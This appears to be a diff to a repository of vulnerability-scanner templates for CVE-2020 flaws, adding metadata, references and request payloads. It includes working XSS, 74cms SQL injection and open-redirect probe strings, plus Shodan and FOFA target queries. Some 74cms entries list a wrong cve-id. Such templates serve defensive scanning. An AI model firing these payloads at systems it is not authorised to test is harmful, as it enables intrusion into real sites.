   name: shadoweb wdja v1.5.1 - Cross-Site Scripting
-  author: pikpikcu
+  author: pikpikcu,ritikchaddha
   severity: critical
-  description: "shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php."
+  description: shadoweb wdja v1.5.1 is susceptible to cross-site scripting because it allows attackers to execute arbitrary code and gain escalated privileges via the backurl parameter to /php/passport/index.php.
   reference:
     - https://github.com/shadoweb/wdja/issues/1
     - https://nvd.nist.gov/vuln/detail/CVE-2020-20982
+  metadata:
+    verified: true
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
     cvss-score: 9.6
@@ -18,7 +20,6 @@ info:
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/php/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
       - "{{BaseURL}}/passport/index.php?action=manage&mtype=userset&backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
 
     stop-at-first-match: true
@@ -27,11 +28,15 @@ requests:
       - type: word
         condition: and
         words:
-          - '</script><script>alert(document.domain)</script>'
+          - "location.href='</script><script>alert(document.domain)</script>"
 
       - type: word
         part: header
         words:
           - 'text/html'
 
+      - type: status
+        status:
+          - 200
+
 # Enhanced by mp on 2022/04/27
diff --git a/cves/2020/CVE-2020-20988.yaml b/cves/2020/CVE-2020-20988.yaml
new file mode 100644
index 0000000000..6672172c5b
--- /dev/null
+++ b/cves/2020/CVE-2020-20988.yaml
@@ -0,0 +1,49 @@
+id: CVE-2020-20988
+
+info:
+  name: DomainMOD 4.13.0 - Cross-Site Scripting
+  author: arafatansari
+  severity: medium
+  description: |
+    DomainMOD 4.13.0 is vulnerable to cross-site scripting via reporting/domains/cost-by-owner.php in the "or Expiring Between" parameter.
+  reference:
+    - https://mycvee.blogspot.com/p/xss2.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-20988
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+    cvss-score: 5.4
+    cve-id: CVE-2020-20988
+    cwe-id: CWE-79
+  metadata:
+    verified: "true"
+  tags: cve,cve2020,domainmod,xss,authenticated
+
+requests:
+  - raw:
+      - |
+        POST / HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        new_username={{username}}&new_password={{password}}
+      - |
+        POST /reporting/domains/cost-by-owner.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
+
+    cookie-reuse: true
+    req-condition: true
+    redirects: true
+    max-redirects: 2
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_2 == 200'
+          - 'contains(all_headers_2, "text/html")'
+          - 'contains(body_2, "value=\"\"/><script>alert(document.domain)</script>")'
+          - 'contains(body_2, "DomainMOD")'
+        condition: and
+
+# Enhanced by mp on 2022/08/14
diff --git a/cves/2020/CVE-2020-2103.yaml b/cves/2020/CVE-2020-2103.yaml
index 879bf90e88..9593563e0e 100644
--- a/cves/2020/CVE-2020-2103.yaml
+++ b/cves/2020/CVE-2020-2103.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2020-2103
     - https://www.jenkins.io/security/advisory/2020-01-29/#SECURITY-1695
+    - https://jenkins.io/security/advisory/2020-01-29/#SECURITY-1695
+    - http://www.openwall.com/lists/oss-security/2020/01/29/1
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 5.4
diff --git a/cves/2020/CVE-2020-21224.yaml b/cves/2020/CVE-2020-21224.yaml
index 13e84b82c6..9c65602ffd 100644
--- a/cves/2020/CVE-2020-21224.yaml
+++ b/cves/2020/CVE-2020-21224.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - https://github.com/NS-Sp4ce/Inspur/tree/master/ClusterEngineV4.0%20Vul
     - https://nvd.nist.gov/vuln/detail/CVE-2020-21224
+    - https://github.com/NS-Sp4ce/Inspur/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-2140.yaml b/cves/2020/CVE-2020-2140.yaml
index 97c2589e77..e124a6fc81 100644
--- a/cves/2020/CVE-2020-2140.yaml
+++ b/cves/2020/CVE-2020-2140.yaml
@@ -8,6 +8,8 @@ info:
   reference:
     - https://www.jenkins.io/security/advisory/2020-03-09/
     - https://nvd.nist.gov/vuln/detail/CVE-2020-2140
+    - https://jenkins.io/security/advisory/2020-03-09/#SECURITY-1722
+    - http://www.openwall.com/lists/oss-security/2020/03/09/1
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2020/CVE-2020-22208.yaml b/cves/2020/CVE-2020-22208.yaml
new file mode 100644
index 0000000000..57659b9d5d
--- /dev/null
+++ b/cves/2020/CVE-2020-22208.yaml
@@ -0,0 +1,36 @@
+id: CVE-2020-22208
+
+info:
+  name: 74cms - ajax_street.php 'x' SQL Injection
+  author: ritikchaddha
+  severity: critical
+  description: |
+    SQL Injection in 74cms 3.2.0 via the x parameter to plus/ajax_street.php.
+  reference:
+    - https://github.com/blindkey/cve_like/issues/10
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-22208
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-22210
+    cwe-id: CWE-89
+  metadata:
+    fofa-query: app="74cms"
+    shodan-query: http.html:"74cms"
+  tags: cve,cve2020,74cms,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/plus/ajax_street.php?act=alphabet&x=11�%27%20union%20select%201,2,3,concat(0x3C2F613E20),5,6,7,md5({{num}}),9%20from%20qs_admin#'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+# Enhanced by cs on 2022/06/21
diff --git a/cves/2020/CVE-2020-22209.yaml b/cves/2020/CVE-2020-22209.yaml
new file mode 100644
index 0000000000..8b2adad1c9
--- /dev/null
+++ b/cves/2020/CVE-2020-22209.yaml
@@ -0,0 +1,36 @@
+id: CVE-2020-22209
+
+info:
+  name: 74cms - ajax_common.php SQL Injection
+  author: ritikchaddha
+  severity: critical
+  description: |
+    SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.
+  reference:
+    - https://github.com/blindkey/cve_like/issues/12
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-22209
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-22210
+    cwe-id: CWE-89
+  metadata:
+    fofa-query: app="74cms"
+    shodan-query: http.html:"74cms"
+  tags: cve,cve2020,74cms,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{num}}),3%23%27'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+# Enhanced by cs on 2022/06/21
diff --git a/cves/2020/CVE-2020-22210.yaml b/cves/2020/CVE-2020-22210.yaml
index b29717ab7b..fdc3408dfa 100644
--- a/cves/2020/CVE-2020-22210.yaml
+++ b/cves/2020/CVE-2020-22210.yaml
@@ -1,26 +1,36 @@
 id: CVE-2020-22210
 
 info:
-  name: 74cms Sql Injection
-  author: princechaddha
-  severity: high
-  description: A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
+  name: 74cms - ajax_officebuilding.php SQL Injection
+  author: ritikchaddha
+  severity: critical
+  description: |
+    A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-22210
     - https://github.com/blindkey/cve_like/issues/11
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-22210
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
     cve-id: CVE-2020-22210
+    cwe-id: CWE-89
+  metadata:
+    fofa-query: app="74cms"
+    shodan-query: http.html:"74cms"
   tags: cve,cve2020,74cms,sqli
 
+variables:
+  num: "999999999"
+
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=test") and extractvalue(1,concat(0x7e,md5(1234567890))) -- a'
+      - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23'
 
     matchers:
       - type: word
-        words:
-          - "e807f1fcf82d132f9bb018ca6738a19f"
         part: body
+        words:
+          - '{{md5({{num}})}}'
 
-# Enhanced by mp on 2022/03/02
+# Enhanced by cs on 2022/06/21
diff --git a/cves/2020/CVE-2020-22211.yaml b/cves/2020/CVE-2020-22211.yaml
new file mode 100644
index 0000000000..a303d4b08f
--- /dev/null
+++ b/cves/2020/CVE-2020-22211.yaml
@@ -0,0 +1,36 @@
+id: CVE-2020-22211
+
+info:
+  name: 74cms - ajax_street.php 'key' SQL Injection
+  author: ritikchaddha
+  severity: critical
+  description: |
+    SQL Injection in 74cms 3.2.0 via the key parameter to plus/ajax_street.php.
+  reference:
+    - https://github.com/blindkey/cve_like/issues/13
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-22211
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2020-22210
+    cwe-id: CWE-89
+  metadata:
+    fofa-query: app="74cms"
+    shodan-query: http.html:"74cms"
+  tags: cve,cve2020,74cms,sqli
+
+variables:
+  num: "999999999"
+
+requests:
+  - method: GET
+    path:
+      - '{{BaseURL}}/plus/ajax_street.php?act=key&key=%E9%8C%A6%27%20union%20select%201,2,3,4,5,6,7,md5({{num}}),9%23'
+
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5({{num}})}}'
+
+# Enhanced by cs on 2022/06/21
diff --git a/cves/2020/CVE-2020-22840.yaml b/cves/2020/CVE-2020-22840.yaml
index a642e28b21..d4ac572b08 100644
--- a/cves/2020/CVE-2020-22840.yaml
+++ b/cves/2020/CVE-2020-22840.yaml
@@ -14,15 +14,15 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2020-22840
     cwe-id: CWE-601
-  tags: cve,cve2020,redirect,b2evolution
+  tags: packetstorm,edb,cve,cve2020,redirect,b2evolution
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Fexample.com"
+      - "{{BaseURL}}/email_passthrough.php?email_ID=1&type=link&email_key=5QImTaEHxmAzNYyYvENAtYHsFu7fyotR&redirect_to=http%3A%2F%2Finteract.sh"
 
     matchers:
       - type: regex
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
         part: header
diff --git a/cves/2020/CVE-2020-23015.yaml b/cves/2020/CVE-2020-23015.yaml
index 97f4de8c09..a718da52a7 100644
--- a/cves/2020/CVE-2020-23015.yaml
+++ b/cves/2020/CVE-2020-23015.yaml
@@ -19,10 +19,10 @@ requests:
   - method: GET
 
     path:
-      - '{{BaseURL}}/?url=http://example.com'
+      - '{{BaseURL}}/?url=http://interact.sh'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
\ No newline at end of file
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
\ No newline at end of file
diff --git a/cves/2020/CVE-2020-23517.yaml b/cves/2020/CVE-2020-23517.yaml
index 644463c4a1..e70c945575 100644
--- a/cves/2020/CVE-2020-23517.yaml
+++ b/cves/2020/CVE-2020-23517.yaml
@@ -1,33 +1,45 @@
 id: CVE-2020-23517
 
 info:
-  name: Aryanic HighMail (High CMS) Cross-Site Scripting
+  name: Aryanic HighMail (High CMS) - Cross-Site Scripting
   author: geeknik
   severity: medium
   description: A cross-site scripting vulnerability in Aryanic HighMail (High CMS) versions 2020 and before allows remote attackers to inject arbitrary web script or HTML, via 'user' to LoginForm.
   reference:
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-23517
     - https://vulnerabilitypublishing.blogspot.com/2021/03/aryanic-highmail-high-cms-reflected.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-23517
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-23517
     cwe-id: CWE-79
-  tags: xss,cve,cve2020
+  metadata:
+    verified: true
+    shodan-query: title:"HighMail"
+    fofa-query: title="HighMail"
+  tags: cve,cve2020,xss,cms,highmail,aryanic
 
 requests:
   - method: GET
     path:
-      - "{{BaseURL}}/login/?uid=\"><img%20src=\"x\"%20onerror=\"alert(%27XSS%27);\">"
+      - "{{BaseURL}}/login/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
+      - "{{BaseURL}}/?uid=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
+
+      - type: word
+        words:
+          - 'value=""><script>alert(document.domain)</script>'
+
       - type: word
         words:
           - text/html
         part: header
-      - type: word
-        words:
-          - "<img src=\"x\" onerror=\"alert('XSS')"
+
+      - type: status
+        status:
+          - 200
 
 # Enhanced by mp on 2022/03/14
diff --git a/cves/2020/CVE-2020-23575.yaml b/cves/2020/CVE-2020-23575.yaml
index 325fde225a..d525cdaede 100644
--- a/cves/2020/CVE-2020-23575.yaml
+++ b/cves/2020/CVE-2020-23575.yaml
@@ -14,7 +14,7 @@ info:
     cvss-score: 7.5
     cve-id: CVE-2020-23575
     cwe-id: CWE-22
-  tags: cve,cve2020,printer,iot,lfi
+  tags: cve,cve2020,printer,iot,lfi,edb
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-23972.yaml b/cves/2020/CVE-2020-23972.yaml
index af446a7e5d..de9d0c9fe3 100644
--- a/cves/2020/CVE-2020-23972.yaml
+++ b/cves/2020/CVE-2020-23972.yaml
@@ -1,22 +1,23 @@
 id: CVE-2020-23972
 
 info:
-  name: Joomla! Component GMapFP 3.5 - Unauthenticated Arbitrary File Upload
+  name: Joomla! Component GMapFP 3.5 - Arbitrary File Upload
   author: dwisiswant0
   severity: high
   description: |
-    An attacker can access the upload function of the application
-    without authenticating to the application and also can upload
-    files due the issues of unrestricted file upload which can be
-    bypassed by changing Content-Type & name file too double ext.
+    Joomla! Component GMapFP 3.5 is vulnerable to arbitrary file upload vulnerabilities. An attacker can access the upload function of the application
+    without authentication and can upload files because of unrestricted file upload which can be bypassed by changing Content-Type & name file too double ext.
   reference:
     - https://www.exploit-db.com/exploits/49129
+    - https://raw.githubusercontent.com/me4yoursecurity/Reports/master/README.md
+    - http://packetstormsecurity.com/files/159072/Joomla-GMapFP-J3.5-J3.5F-Arbitrary-File-Upload.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-23972
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
     cvss-score: 7.5
     cve-id: CVE-2020-23972
     cwe-id: CWE-434
-  tags: cve,cve2020,joomla
+  tags: cve,cve2020,joomla,edb,packetstorm,fileupload,intrusive
 
 requests:
   - raw:
@@ -54,3 +55,5 @@ requests:
         part: body
         regex:
           - "window\\.opener\\.(changeDisplayImage|addphoto)\\(\"(.*?)\"\\);"
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-24186.yaml b/cves/2020/CVE-2020-24186.yaml
index 77256db08a..3359b0debb 100644
--- a/cves/2020/CVE-2020-24186.yaml
+++ b/cves/2020/CVE-2020-24186.yaml
@@ -4,17 +4,18 @@ info:
   name: WordPress wpDiscuz <=7.0.4 - Remote Code Execution
   author: Ganofins
   severity: critical
-  description: WordPress wpDiscuz plugin versions  version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP
-    files, and achieve remote code execution on a vulnerable site's server.
+  description: WordPress wpDiscuz plugin versions  version 7.0 through 7.0.4 are susceptible to remote code execution. This flaw gave unauthenticated attackers the ability to upload arbitrary files, including PHP files, and achieve remote code execution on a vulnerable site's server.
   reference:
     - https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md
     - https://nvd.nist.gov/vuln/detail/CVE-2020-24186
+    - https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/
+    - http://packetstormsecurity.com/files/162983/WordPress-wpDiscuz-7.0.4-Shell-Upload.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 10.0
+    cvss-score: 10
     cve-id: CVE-2020-24186
     cwe-id: CWE-434
-  tags: cve,cve2020,wordpress,wp-plugin,rce,upload
+  tags: rce,fileupload,packetstorm,cve,cve2020,wordpress,wp-plugin,intrusive
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-24223.yaml b/cves/2020/CVE-2020-24223.yaml
index 094373e691..7ec7a3e49f 100644
--- a/cves/2020/CVE-2020-24223.yaml
+++ b/cves/2020/CVE-2020-24223.yaml
@@ -4,18 +4,18 @@ info:
   name: Mara CMS  7.5 - Cross-Site Scripting
   author: pikpikcu
   severity: medium
-  description: "Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters."
+  description: Mara CMS 7.5 allows reflected cross-site scripting in contact.php via the theme or pagetheme parameters.
   reference:
     - https://www.exploit-db.com/exploits/48777
-    - https://sourceforge.net/projects/maracms/ # vendor homepage
-    - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download # software link
+    - https://sourceforge.net/projects/maracms/
+    - https://sourceforge.net/projects/maracms/files/MaraCMS75.zip/download
     - https://nvd.nist.gov/vuln/detail/CVE-2020-24223
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-24223
     cwe-id: CWE-79
-  tags: cve,cve2020,mara,xss
+  tags: cve,cve2020,mara,xss,edb
 
 requests:
   - method: GET
diff --git a/cves/2020/CVE-2020-24391.yaml b/cves/2020/CVE-2020-24391.yaml
index d0bc0cf514..8d737c98d5 100644
--- a/cves/2020/CVE-2020-24391.yaml
+++ b/cves/2020/CVE-2020-24391.yaml
@@ -9,6 +9,7 @@ info:
     - https://securitylab.github.com/advisories/GHSL-2020-131-mongo-express/
     - https://github.com/mongo-express/mongo-express/commit/3a26b079e7821e0e209c3ee0cc2ae15ad467b91a
     - https://nvd.nist.gov/vuln/detail/CVE-2020-24391
+    - https://github.com/mongodb-js/query-parser/issues/16
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2020/CVE-2020-24550.yaml b/cves/2020/CVE-2020-24550.yaml
index b7eecbd3ea..344189257f 100644
--- a/cves/2020/CVE-2020-24550.yaml
+++ b/cves/2020/CVE-2020-24550.yaml
@@ -17,14 +17,14 @@ info:
 requests:
   - method: GET
     path:
-      - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://example.com'
+      - '{{BaseURL}}/find_v2/_click?_t_id=&_t_q=&_t_hit.id=&_t_redirect=https://interact.sh'
 
     matchers-condition: and
     matchers:
       - type: word
         part: header
         words:
-          - "Location: https://example.com"
+          - "Location: https://interact.sh"
 
       - type: status
         status:
diff --git a/cves/2020/CVE-2020-24571.yaml b/cves/2020/CVE-2020-24571.yaml
index c54df7ed6f..a89c9b23e4 100644
--- a/cves/2020/CVE-2020-24571.yaml
+++ b/cves/2020/CVE-2020-24571.yaml
@@ -1,12 +1,13 @@
 id: CVE-2020-24571
 
 info:
-  name: NexusDB v4.50.22 Path Traversal
+  name: NexusDB <4.50.23 - Local File Inclusion
   author: pikpikcu
   severity: high
-  description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal.
+  description: NexusQA NexusDB before 4.50.23 allows the reading of files via ../ directory traversal and local file inclusion.
   reference:
     - https://www.nexusdb.com/mantis/bug_view_advanced_page.php?bug_id=2371
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-24571
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
@@ -29,3 +30,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-24579.yaml b/cves/2020/CVE-2020-24579.yaml
index 57a6a48383..b3b8bc7767 100644
--- a/cves/2020/CVE-2020-24579.yaml
+++ b/cves/2020/CVE-2020-24579.yaml
@@ -1,12 +1,14 @@
 id: CVE-2020-24579
 
 info:
-  name: D-Link DSL 2888a - Remote Command Execution
+  name: D-Link DSL 2888a - Authentication Bypass/Remote Command Execution
   author: pikpikcu
   severity: high
-  description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
+  description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
   reference:
     - https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
+    - https://www.trustwave.com/en-us/resources/security-resources/security-advisories/
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-24579
   classification:
     cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -39,3 +41,5 @@ requests:
           - "nobody:[x*]:65534:65534"
           - "root:.*:0:0:"
         condition: or
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-24912.yaml b/cves/2020/CVE-2020-24912.yaml
index b374a16f3e..5806510c92 100644
--- a/cves/2020/CVE-2020-24912.yaml
+++ b/cves/2020/CVE-2020-24912.yaml
@@ -4,8 +4,7 @@ info:
   name: QCube Cross-Site-Scripting
   author: pikpikcu
   severity: medium
-  description: A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated
-    users.
+  description: A reflected cross-site scripting vulnerability in qcubed (all versions including 3.1.1) in profile.php via the stQuery-parameter allows unauthenticated attackers to steal sessions of authenticated users.
   reference:
     - https://www.ait.ac.at/themen/cyber-security/pentesting/security-advisories/ait-sa-20210215-03
     - https://github.com/qcubed/qcubed/pull/1320/files
@@ -16,7 +15,7 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2020-24912
     cwe-id: CWE-79
-  tags: cve,cve2020,qcubed,xss
+  tags: cve,cve2020,qcubed,xss,seclists
 
 requests:
   - method: POST
diff --git a/cves/2020/CVE-2020-24949.yaml b/cves/2020/CVE-2020-24949.yaml
index 1b001b85b1..0840b310e1 100644
--- a/cves/2020/CVE-2020-24949.yaml
+++ b/cves/2020/CVE-2020-24949.yaml
@@ -1,17 +1,21 @@
 id: CVE-2020-24949
 
 info:
-  name: PHPFusion 9.03.50 Remote Code Execution
+  name: PHP-Fusion 9.03.50 - Remote Code Execution
   author: geeknik
   severity: high
-  description: Privilege escalation in PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution (RCE).
+  description: PHP-Fusion 9.03.50 downloads/downloads.php allows an authenticated user (not admin) to send a crafted request to the server and perform remote command execution.
   reference:
     - https://packetstormsecurity.com/files/162852/phpfusion90350-exec.txt
+    - https://github.com/php-fusion/PHP-Fusion/issues/2312
+    - http://packetstormsecurity.com/files/162852/PHPFusion-9.03.50-Remote-Code-Execution.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-24949
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
     cve-id: CVE-2020-24949
-  tags: cve,cve2020,phpfusion,rce,php
+    cwe-id: CWE-77
+  tags: rce,php,packetstorm,cve,cve2020,phpfusion
 
 requests:
   - method: GET
@@ -28,4 +32,6 @@ requests:
       - type: word
         part: body
         words:
-          - "infusion_db.php"
\ No newline at end of file
+          - "infusion_db.php"
+
+# Enhanced by mp on 2022/07/13
diff --git a/cves/2020/CVE-2020-25078.yaml b/cves/2020/CVE-2020-25078.yaml
index dbee307b82..9446eae118 100644
--- a/cves/2020/CVE-2020-25078.yaml
+++ b/cves/2020/CVE-2020-25078.yaml
@@ -1,11 +1,13 @@
 id: CVE-2020-25078
 
 info:
-  name: D-Link DCS-2530L Administrator password disclosure
+  name: D-Link DCS-2530L/DCS-2670L  - Administrator Password Disclosure
   author: pikpikcu
   severity: high
-  description: An issue was discovered on D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices. The unauthenticated /config/getuser endpoint allows for remote administrator password disclosure.
+  description: D-Link DCS-2530L before 1.06.01 Hotfix and DCS-2670L through 2.02 devices are vulnerable to password disclosures vulnerabilities because the  /config/getuser endpoint allows for remote administrator password disclosure.
   reference:
+    - https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10180
+    - https://twitter.com/Dogonsecurity/status/1273251236167516161
     - https://nvd.nist.gov/vuln/detail/CVE-2020-25078
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
@@ -34,3 +36,5 @@ requests:
       - type: status
         status:
           - 200
+
+# Enhanced by mp on 2022/07/15
diff --git a/cves/2020/CVE-2020-25213.yaml b/cves/2020/CVE-2020-25213.yaml
index e0670b8710..32e21228e1 100644
--- a/cves/2020/CVE-2020-25213.yaml
+++ b/cves/2020/CVE-2020-25213.yaml
@@ -17,7 +17,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2020-25213
     cwe-id: CWE-434
-  tags: cve,cve2020,wordpress,rce
+  tags: cve,cve2020,wordpress,rce,kev,fileupload,intrusive
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-25223.yaml b/cves/2020/CVE-2020-25223.yaml
index 87701a8054..a6071d6556 100644
--- a/cves/2020/CVE-2020-25223.yaml
+++ b/cves/2020/CVE-2020-25223.yaml
@@ -9,11 +9,12 @@ info:
     - https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
     - https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223
     - https://nvd.nist.gov/vuln/detail/CVE-2020-25223
+    - https://community.sophos.com/b/security-blog
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2020-25223
-  tags: cve,cve2020,sophos,rce,oast,unauth
+  tags: cve,cve2020,sophos,rce,oast,unauth,kev
 
 requests:
   - raw:
diff --git a/cves/2020/CVE-2020-25495.yaml b/cves/2020/CVE-2020-25495.yaml
index f3a93f9bfe..23cb0b698f 100644
--- a/cves/2020/CVE-2020-25495.yaml
+++ b/cves/2020/CVE-2020-25495.yaml
@@ -1,18 +1,21 @@
 id: CVE-2020-25495
 
 info:
-  name: SCO Openserver 5.0.7 - 'section' Cross-Site scripting
+  name: Xinuo Openserver 5/6 - Cross-Site scripting
   author: 0x_Akoko
   severity: medium
-  description: A reflected cross-site scripting (XSS) vulnerability in Xinuo (formerly SCO) Openserver version 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section'.
+  description: Xinuo (formerly SCO) Openserver versions 5 and 6 allows remote attackers to inject arbitrary web script or HTML tag via the parameter 'section' and is vulnerable to reflected cross-site scripting.
   reference:
     - https://www.exploit-db.com/exploits/49300
+    - https://github.com/Ramikan/Vulnerabilities/blob/master/SCO%20Openserver%20XSS%20%26%20HTML%20Injection%20vulnerability
+    - http://packetstormsecurity.com/files/160634/SCO-Openserver-5.0.7-Cross-Site-Scripting.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-25495
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2020-25495
     cwe-id: CWE-79
-  tags: cve,cve2020,sco,xss
